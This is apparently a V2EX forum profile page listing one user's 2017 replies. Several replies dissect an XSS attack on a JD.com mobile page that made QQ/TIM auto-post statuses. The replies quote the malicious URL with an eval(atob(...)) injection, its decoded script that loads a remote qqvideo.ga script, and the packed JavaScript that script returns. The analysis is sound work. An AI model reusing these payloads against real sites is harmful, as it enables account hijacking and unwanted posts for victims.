V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  cy97cool  ›  全部回复第 11 页 / 共 14 页
回复总数  280
1 ... 3  4  5  6  7  8  9  10  11  12 ... 14  
2017-12-29 22:02:58 +08:00
回复了 hging 创建的主题 还有这种操作?现在的人都这么丢脸了么。
已经 404 了
github 也能删 issue 的?
2017-12-29 20:09:22 +08:00
回复了 sankoshine 创建的主题 Google 从此 Google 一生黑: Google 照片得而复失
@ooo3o 然而买多了硬盘 /网盘多传几个地方就搞不清一份文件有多少份冗余,每个地方是哪份历史版本

而且想找也麻烦,怎么管理这些散落在不同地方的文
件呢?
2017-12-26 18:25:23 +08:00
回复了 niuoh 创建的主题 职场话题 没想到 mysql 删库跑路已经发生在我身上了
@mokeyjay 好奇人家发的啥恶意内容
2017-12-23 00:04:44 +08:00
回复了 limingchenxi 创建的主题 问与答 请教个 fping 命令回显写入的问题
末尾加上 2>&1
表示把 stderr 合并到 stdout
2017-12-22 15:37:41 +08:00
回复了 cy97cool 创建的主题 全球工单系统 这是京东被日了? qq 或 tim 打开就会自动发说说
@ljsh0102 我用手机 tim 打开本帖
https://www.v2ex.com/t/416827#reply24

可以点开 1L 的长链接
2017-12-22 15:32:46 +08:00
回复了 cy97cool 创建的主题 全球工单系统 这是京东被日了? qq 或 tim 打开就会自动发说说
@Va1n3R
谢谢大佬

看起来还需要继续跟进 index.js 也许才知道 csrf 咋实现的
2017-12-22 15:23:04 +08:00
回复了 cy97cool 创建的主题 全球工单系统 这是京东被日了? qq 或 tim 打开就会自动发说说
@fucker 你试试咯。。。。
c35 is not defined

难道 qq 浏览器有啥 js 内置变量导致这个判断能过?
2017-12-22 15:17:53 +08:00
回复了 cy97cool 创建的主题 全球工单系统 这是京东被日了? qq 或 tim 打开就会自动发说说
@Va1n3R 大神能不能解密一下人家这 xml.php 啊

我已经在 4 楼给出了,但尝试执行也会报 c35 没定义的错。。。手动把 c35 定义为 0 可以得到内容但网址是 undefined
2017-12-22 15:09:24 +08:00
回复了 cy97cool 创建的主题 全球工单系统 这是京东被日了? qq 或 tim 打开就会自动发说说
@Va1n3R 原理其实我都懂。。。。只是想知道这个 csrf 的具体实现
2017-12-22 14:58:44 +08:00
回复了 cy97cool 创建的主题 全球工单系统 这是京东被日了? qq 或 tim 打开就会自动发说说
@fucker
京东的 xss 已经很显然了,但在用户不知情的情况下自动发说说咋实现的 这一点也许更有趣
2017-12-22 14:51:58 +08:00
回复了 cy97cool 创建的主题 全球工单系统 这是京东被日了? qq 或 tim 打开就会自动发说说
在 qq 中点开这个 php 链接得到的是

(~eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('r=f(){l s};f m(6){7 4="";p(7 i=0;i<6.q;i++){7 a=6.t(i);e(a=="+"){4+=" "}d e(a=="%"){7 b=6.n(i+1,i+3);e(j("h"+b)>w){4+=x("%"+6.n(i+1,i+9));i+=8}d{4+=u.v(j("h"+b));i+=2}}d{4+=a}}l 4}f o(k){5.M("N/O","J");5.K(m(L(k.R)));5.Q()}7 g=5.P("B");g.C="y://z.D.H/I.G?E=c";5.F.A(g);',54,54,'||||ret|document|str|var|||chr|asc||else|if|function|vs|0x||parseInt|req|return|URLdecode|substring|callback_vs|for|length|onerror|true|charAt|String|fromCharCode|0x7f|decodeURI|http|www|appendChild|script|src|qqvideo|ac|head|php|ga|xml|replace|write|atob|open|text|html|createElement|close|content'.split('|'),0,{})))


不知道咋解密这 js。。。也许已经访问过会不一样?
2017-12-22 14:50:28 +08:00
回复了 cy97cool 创建的主题 全球工单系统 这是京东被日了? qq 或 tim 打开就会自动发说说
jd 这个页面有 xss

atob 解密出来是

"var s= document.createElement(\"script\");

s.src = \"http://www.qqvideo.ga/xml.php\";

document.head.appendChild(s);"
2017-12-22 14:41:20 +08:00
回复了 cy97cool 创建的主题 全球工单系统 这是京东被日了? qq 或 tim 打开就会自动发说说
还原的长链接

http://initem.m.jd.com/product/1.html?奔驰男撞人还打人!嚣张气焰终于被干了!过瘾...24101"};eval(atob('dmFyIHM9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpOw0Kcy5zcmMgPSAiaHR0cDovL3d3dy5xcXZpZGVvLmdhL3htbC5waHAiOw0KZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs='));x={c:"x
@notgood 印象笔记·剪藏 本身就不完美
方法 1:找客户支持
方法 2:自己改扩展的 js
2017-11-30 16:08:27 +08:00
回复了 kamen 创建的主题 分享发现 暴走大事件复活!
2017-11-30 00:39:44 +08:00
回复了 Jaeger 创建的主题 IPFS IPFS 图床,图片无限制永久存储
@bobiscool 早就有了
zeronet
2017-11-27 18:30:52 +08:00
回复了 BluceW 创建的主题 问与答 无敌的百度网盟推广
@BluceW 默认更新有可能失败的,似乎被墙了
2017-11-27 17:44:47 +08:00
回复了 BluceW 创建的主题 问与答 无敌的百度网盟推广
adblock plus 一切正常,是不是你的插件规则订阅更新失败了
2017-11-24 22:02:26 +08:00
回复了 thinks 创建的主题 云计算 有和我一样的 V 友吗? Vultr 故障,数据全丢。
感谢 lz 提醒数据备份
1 ... 3  4  5  6  7  8  9  10  11  12 ... 14  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1122 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 32ms · UTC 19:20 · PVG 03:20 · LAX 11:20 · JFK 14:20
Developed with CodeLauncher
♥ Do have faith in what you're doing.